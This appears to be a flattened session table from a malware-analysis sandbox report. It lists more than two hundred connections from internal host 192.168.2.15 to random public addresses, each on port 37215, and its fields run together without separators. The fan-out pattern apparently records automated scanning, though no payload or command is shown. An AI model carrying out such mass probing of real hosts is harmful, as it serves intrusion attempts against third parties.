                                              14026192.168.2.155516037.160.18.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14027192.168.2.155391037.246.221.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14028192.168.2.1532984156.2.92.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14029192.168.2.1537676121.78.85.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14030192.168.2.1538562157.17.58.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14031192.168.2.154825641.52.73.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14032192.168.2.1537316205.9.17.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14033192.168.2.154364845.200.8.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14034192.168.2.1547278102.240.242.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14035192.168.2.1551638121.153.131.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14036192.168.2.1558594190.81.192.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14037192.168.2.1546858197.149.211.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14038192.168.2.155675694.118.251.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14039192.168.2.1543004190.6.135.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14040192.168.2.1557438157.183.82.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14041192.168.2.1536134157.0.203.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14042192.168.2.1543390197.145.189.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14043192.168.2.1536278138.2.227.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14044192.168.2.154921841.46.136.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14045192.168.2.155845894.55.149.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14046192.168.2.155598094.0.239.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14047192.168.2.154888431.227.113.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14048192.168.2.1540990157.212.216.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14049192.168.2.1557196222.229.135.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14050192.168.2.1533152222.92.146.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14051192.168.2.1535572121.149.115.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14052192.168.2.1559692102.38.83.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14053192.168.2.1554448122.205.10.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14054192.168.2.1544228121.172.161.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14055192.168.2.1549680181.141.59.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14056192.168.2.154678845.90.81.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14057192.168.2.1560094122.202.77.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14058192.168.2.1542652157.238.112.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14059192.168.2.1546722156.122.115.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14060192.168.2.155424094.56.240.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14061192.168.2.1534410186.164.128.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14062192.168.2.1548670197.198.164.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14063192.168.2.154132045.111.52.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14064192.168.2.1547092190.67.210.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14065192.168.2.1560666186.163.165.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14066192.168.2.1557892197.25.17.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14067192.168.2.1544726222.191.8.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14068192.168.2.1560394138.69.141.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14069192.168.2.1557142181.36.93.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14070192.168.2.1554064122.18.211.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14071192.168.2.1555310122.164.146.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14072192.168.2.1533616197.89.204.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14073192.168.2.154933431.168.231.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14074192.168.2.153573637.47.164.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14075192.168.2.1533968122.147.114.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14076192.168.2.1545560156.113.58.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14077192.168.2.155120637.144.15.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14078192.168.2.1560966183.48.80.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14079192.168.2.1548002156.85.123.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14080192.168.2.1534704222.6.196.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14081192.168.2.1553258190.75.30.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14082192.168.2.1535568121.35.86.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14083192.168.2.1542612138.187.91.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14084192.168.2.153719837.77.228.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14085192.168.2.1552290186.34.13.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14086192.168.2.1549688222.205.49.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14087192.168.2.1558518181.109.132.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14088192.168.2.1543820138.122.31.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14089192.168.2.1532904122.223.4.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14090192.168.2.155132845.108.69.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14091192.168.2.155300437.3.184.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14092192.168.2.1536982222.232.113.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14093192.168.2.1549142156.60.206.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14094192.168.2.1534688138.31.36.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14095192.168.2.154577651.53.234.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14096192.168.2.1539396157.187.177.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14097192.168.2.1546376181.149.50.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14098192.168.2.1546868122.23.23.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14099192.168.2.155000437.158.1.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14100192.168.2.1548912222.15.161.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14101192.168.2.1534292102.219.218.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14102192.168.2.154674631.205.64.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14103192.168.2.153772294.79.44.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14104192.168.2.1559530121.65.181.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14105192.168.2.1559936138.115.159.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14106192.168.2.1541874161.110.20.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14107192.168.2.1556012121.224.211.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14108192.168.2.1538316121.105.93.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14109192.168.2.1534020197.138.229.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14110192.168.2.1545292122.57.238.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14111192.168.2.153512031.105.27.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14112192.168.2.1535862181.121.181.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14113192.168.2.1536842121.140.52.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14114192.168.2.1538498102.126.56.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14115192.168.2.1546696222.178.233.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14116192.168.2.153439841.29.197.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14117192.168.2.1554830190.250.226.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14118192.168.2.154153231.200.205.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14119192.168.2.1545254102.138.185.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14120192.168.2.1543606138.139.134.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14121192.168.2.1553948138.41.158.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14122192.168.2.154764237.117.177.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14123192.168.2.1549452122.57.245.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14124192.168.2.1536772190.128.194.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14125192.168.2.1539170157.240.22.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14126192.168.2.154894041.230.30.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14127192.168.2.153843631.25.67.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14128192.168.2.153375045.116.254.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14129192.168.2.155687431.255.36.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14130192.168.2.1540424190.237.106.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14131192.168.2.1551956197.176.62.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14132192.168.2.153294241.247.152.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14133192.168.2.1536106186.109.112.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14134192.168.2.1551284121.175.158.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14135192.168.2.154400045.234.250.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14136192.168.2.156007045.222.22.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14137192.168.2.154416037.6.165.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14138192.168.2.1555652156.66.236.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14139192.168.2.1548954156.132.62.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14140192.168.2.1539650122.142.72.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14141192.168.2.1546182102.73.245.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14142192.168.2.1552486222.244.245.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14143192.168.2.1558562121.108.236.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14144192.168.2.1543696102.204.216.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14145192.168.2.155212437.150.75.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14146192.168.2.1558186102.41.112.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14147192.168.2.1549238190.232.180.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14148192.168.2.154105094.217.73.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14149192.168.2.154927094.222.35.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14150192.168.2.154105041.246.243.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14151192.168.2.1547548156.64.194.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14152192.168.2.1547812181.39.2.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14153192.168.2.1554228197.56.152.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14154192.168.2.1557506121.20.103.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14155192.168.2.1537700222.15.0.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14156192.168.2.1533246122.26.102.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14157192.168.2.156042431.47.237.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14158192.168.2.155421031.234.146.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14159192.168.2.156019631.164.215.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14160192.168.2.155588841.45.168.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14161192.168.2.154096237.12.230.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14162192.168.2.156079631.101.145.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14163192.168.2.1533568122.145.217.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14164192.168.2.1555762197.47.196.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14165192.168.2.154462294.200.233.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14166192.168.2.1537602121.233.131.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14167192.168.2.155227845.46.177.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14168192.168.2.1546984181.237.54.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14169192.168.2.1537308190.26.247.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14170192.168.2.155630294.135.186.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14171192.168.2.155234441.13.92.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14172192.168.2.1536666181.163.229.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14173192.168.2.155811294.233.229.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14174192.168.2.155949431.76.35.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14175192.168.2.1550864157.163.24.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14176192.168.2.1560282102.127.149.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14177192.168.2.1535434222.125.59.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14178192.168.2.155573094.4.108.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14179192.168.2.1542262138.95.156.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14180192.168.2.1533030157.181.100.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14181192.168.2.1534678186.121.3.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14182192.168.2.1538940156.33.107.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14183192.168.2.154496245.218.33.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14184192.168.2.1552372186.37.49.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14185192.168.2.155723037.142.39.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14186192.168.2.1535632138.103.105.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14187192.168.2.1542498122.1.21.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14188192.168.2.1559890157.95.166.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14189192.168.2.154242641.101.175.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14190192.168.2.1542880186.162.128.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14191192.168.2.1551956121.97.249.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14192192.168.2.1554932190.238.192.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14193192.168.2.1537028197.71.161.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14194192.168.2.1538324156.135.113.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14195192.168.2.154267437.108.196.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14196192.168.2.1533892102.125.131.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14197192.168.2.1555078173.68.247.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14198192.168.2.153655631.10.39.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14199192.168.2.154689294.185.44.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14200192.168.2.155295045.16.218.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14201192.168.2.1540152157.114.237.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14202192.168.2.1535630156.96.165.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14203192.168.2.1546610102.122.63.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14204192.168.2.155052241.78.206.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14205192.168.2.1554924102.214.168.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14206192.168.2.1543158122.88.59.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14207192.168.2.1539770165.249.201.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14208192.168.2.153712245.167.241.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14209192.168.2.1542420197.179.138.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14210192.168.2.1534558190.120.83.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14211192.168.2.154588245.34.146.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14212192.168.2.1547642156.88.253.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14213192.168.2.1540790222.218.48.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14214192.168.2.1543576156.92.138.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14215192.168.2.1557962138.114.95.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14216192.168.2.1560232156.239.146.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14217192.168.2.1538994157.7.125.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14218192.168.2.1557604122.131.83.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14219192.168.2.155161231.48.78.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14220192.168.2.1550140121.39.174.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14221192.168.2.154780231.102.244.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14222192.168.2.155284494.230.89.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14223192.168.2.154817437.54.209.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14224192.168.2.1556634156.245.246.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14225192.168.2.1545476186.178.92.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14226192.168.2.1551264122.7.186.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14227192.168.2.1536842190.172.185.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14228192.168.2.155489645.121.11.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14229192.168.2.1554254197.171.239.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14230192.168.2.1543066121.197.162.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14231192.168.2.1545518156.155.157.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14232192.168.2.1559528222.36.25.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14233192.168.2.1541962202.16.115.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14234192.168.2.1549398102.52.64.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14235192.168.2.1559494121.152.7.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14236192.168.2.1557876186.156.217.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14237192.168.2.154447241.85.70.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14238192.168.2.1543176156.222.144.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14239192.168.2.1556008122.222.247.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14240192.168.2.1553928222.62.85.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14241192.168.2.1542666181.234.78.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14242192.168.2.155907441.180.93.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14243192.168.2.155792645.44.217.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14244192.168.2.1536750156.159.25.12237215
